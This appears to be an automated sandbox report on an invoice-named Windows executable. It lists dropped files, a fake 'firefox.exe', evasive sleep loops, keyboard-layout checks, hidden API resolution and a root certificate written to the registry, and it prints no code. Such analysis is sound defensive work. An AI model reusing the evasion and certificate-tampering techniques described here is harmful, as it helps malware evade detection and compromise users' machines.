Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | API coverage: 2.6 %
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | API coverage: 2.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 1860 | Thread sleep count: 88 > 30
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044 | Thread sleep count: 130 > 30
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044 | Thread sleep time: -7800000s >= -60000s
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\dllhost.exe TID: 2084 | Thread sleep time: -180000s >= -60000s
Source: C:\Windows\System32\dllhost.exe TID: 2060 | Thread sleep time: -1800000s >= -60000s
Source: C:\Windows\System32\dllhost.exe TID: 2344 | Thread sleep time: -1260000s >= -60000s
Source: C:\Windows\System32\dllhost.exe TID: 2100 | Thread sleep time: -922337203685477s >= -60000s
Source: C:\Windows\explorer.exe TID: 1444 | Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 1436 | Thread sleep count: 203 > 30
Source: C:\Windows\explorer.exe TID: 1436 | Thread sleep time: -12180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1436 | Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_6EE01230 GetKeyboardLayout followed by cmp: cmp al, 0ch and CTI: je 6EE0128Fh
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_00405BEC
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_1_00405BEC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_2_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_2_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004AD294 FindFirstFileW,GetLastError,3_2_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,3_2_004FDF38
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C0BC0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004BF43C FindFirstFileW,FindNextFileW,FindClose,3_2_004BF43C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C107C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_1_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_1_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004AD294 FindFirstFileW,GetLastError,3_1_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FF154 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF154
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FF033 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF033
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF27E
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FEF1D
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E109748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,4_2_6E109748
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E1098CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,4_2_6E1098CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697C98CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,5_2_697C98CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697BEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BEF1D
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697C9748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,5_2_697C9748
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697BF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BF27E
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00383836 SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcat,SHFileOperation,FindNextFileA,SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrcat,CreateFileA,GetFileSize,ReadFile,lstrcat,lstrcat,StrStrA,lstrlen,WriteFile,lstrlen,WriteFile,??3@YAXPAX@Z,CloseHandle,FindNextFileA,6_2_00383836
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_0038364C SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcat,SHFileOperation,DeleteFileA,FindNextFileA,6_2_0038364C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00382F10 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,6_2_00382F10
Contains functionality to query system information
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040ED40 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,2_2_0040ED40
Program exit points
Source: C:\Users\user\Desktop\facture_1398665.exe | API call chain: ExitProcess graph end node graph_2-7768
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Process information queried: ProcessInformation

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,3_2_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_0046335C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,3_2_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004629EC IsIconic,GetCapture,3_2_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00470A2C IsIconic,3_2_00470A2C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00481238 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_00481238
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00463DC8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,ScreenToClient,ScreenToClient,3_2_00463DC8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_0042DBCC MonitorFromWindow,MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,3_2_0042DBCC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004E6860 IsIconic,GetWindowLongW,ShowWindow,ShowWindow,3_2_004E6860
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,3_1_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_1_0046335C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,3_1_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004629EC IsIconic,GetCapture,3_1_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_00470A2C IsIconic,3_1_00470A2C
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_0037F213 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetPr6_2_0037F213
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Stores large binary data to the registry
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\facture_1398665.exe | Process information set: FAILCRITICALERRORS and NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\facture_1398665.exe | Process information set: NOOPENFILEERRORBOX